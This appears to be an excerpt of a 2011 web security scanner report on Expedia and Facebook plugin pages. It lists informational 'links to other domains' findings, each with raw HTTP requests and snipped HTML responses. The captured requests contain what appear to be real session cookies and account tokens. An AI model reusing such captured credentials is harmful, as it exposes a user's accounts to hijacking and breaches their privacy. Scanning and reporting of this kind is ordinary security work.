<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...
24.59. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:36:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01FC4C06DD$F4$B5202000B$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$3A!2$0B$84$DFF$D5$9D$82$AB$89$FB!e02000`132; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 107839

<!-- srvpush1 15:36:07(:810) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ca/" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.dk/" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.fr/" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.de/" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie/" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.it/" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl/" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no/" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es/" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.se/" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...
24.60. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/scripts/exp/core/ChannelTracking.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /static/default/default/scripts/exp/core/ChannelTracking.js?v=1.1&v=release-2011-05-r1.3.182136 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"10855-1304698922517"
Last-Modified: Fri, 06 May 2011 16:22:02 GMT
Content-Type: text/javascript
Cteonnt-Length: 10855
Vary: Accept-Encoding
Cache-Control: private, max-age=65846
Date: Fri, 06 May 2011 22:33:33 GMT
Connection: close
Content-Length: 10855

//configuration --- can be put into separate file
//first flag indicates clear seoid
//second flag - null indicates check for SEMCID, true is to clear the cookie, false is don't clear the cookie
v
...[SNIP]...
/ footer        
       var footerDiv = document.getElementById('footer');
       var dynamicFooterDiv = document.createElement("div");
       dynamicFooterDiv.id = "msnnzFooterSuffix";
       dynamicFooterDiv.innerHTML = '<iframe scrolling=no frameborder=no style="height:65px; width:992px; border:none; overflow:hidden;" border="0" src="http://serviceslb-198436258.us-east-1.elb.amazonaws.com/Header/v1?pt=cobrand&partnerid=40654&pos=29&type=footer"></iframe>
...[SNIP]...
24.61. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281&&zz=1304739644741 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=fbak&&zz=1247500409281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`user=v.8,0,EX01CC562A07$F4$B5203000g$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50K$A9$11$90$F1$8C$A5$D1$82$AB$89$FB!e02000`133

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:40:52 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0183E3F010$F4$B5204000k$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$83$A7rJ$D3$B5$CD3$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`airp=v.1,AUS`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 155628


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
</div>
   <iframe src="https://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
24.62. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=www.allatsea.net&width=300&height=300&header=true&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.115.132
X-Cnection: close
Date: Fri, 06 May 2011 21:06:47 GMT
Content-Length: 11652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6582dfb871f5100f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/Profile_Puerto_Rican_Jaime_Torres" title="Profile Puerto Rican Jaime Torres" target="_top"><img class="img" src="http://www.allatsea.net/assets/ads/latestissue.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.allatsea.net/article/May_2011/Profile_Puerto_Rican_Jaime_Torres" target="_top">Profile Puerto Rican Jaime Torres</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5bd1c02532884631"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/Big_Breeze_and_Lumpy_Seas_Spiced_Up_the_Action_at_Antigua_Sailing_Week_2011_" title="Big Breeze and Lumpy Seas Spiced Up the Action at Antigua Sailing Week 2011" target="_top"><img class="img" src="http://www.allatsea.net/assets/ads/latestissue.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.allatsea.net/article/May_2011/Big_Breeze_and_Lumpy_Seas_Spiced_Up_the_Action_at_Antigua_Sailing_Week_2011_" target="_top">Big Breeze and Lumpy Seas Spiced Up the Action at Antigua Sailing Week 2011</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_30ae46c76990916d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/News_from_Errol_Flynn_Marina_May_2011" title="News from Errol Flynn Marina May 2011" target="_top"><img class="img" src="http://www.allatsea.net/assets/ads/latestissue.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.allatsea.net/article/May_2011/News_from_Errol_Flynn_Marina_May_2011" target="_top">News from Errol Flynn Marina May 2011</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1a3a80ffe4ada1e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/April_2011/Julian_Putley_Pay_Tribute_to_Thomas_John_Kershaw" title="Julian Putley Pay Tribute to Thomas John Kershaw" target="_top"><img class="img" src="http://www.allatsea.net/assets/ads/latestissue.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.allatsea.net/article/April_2011/Julian_Putley_Pay_Tribute_to_Thomas_John_Kershaw" target="_top">Julian Putley Pay Tribute to Thomas John Kershaw</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_3c9bb060657dff1"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/West_End_Yacht_Club_announces_NEW_Racing_Series_with_Goslings_as_the_Sponsor" title="West End Yacht Club announces NEW Racing Series with Goslings as the Sponsor" target="_top"><img class="img" src="http://www.allatsea.net/assets/ads/latestissue.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.allatsea.net/article/May_2011/West_End_Yacht_Club_announces_NEW_Racing_Series_with_Goslings_as_the_Sponsor" target="_top">West End Yacht Club announces NEW Racing Series with Goslings as the Sponsor</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
24.63. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.73.39
X-Cnection: close
Date: Fri, 06 May 2011 22:33:36 GMT
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
24.64. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.198.49
X-Cnection: close
Date: Fri, 06 May 2011 22:41:11 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/S_dxvIdYJ4E.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
24.65. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13d670d48%26origin%3Dhttp%253A%252F%252Fwww.scmagazineus.com%252Ff25bffff5c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=290&href=http%3A%2F%2Fwww.facebook.com%2Fhome.php%23%2521%2FSCMag&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
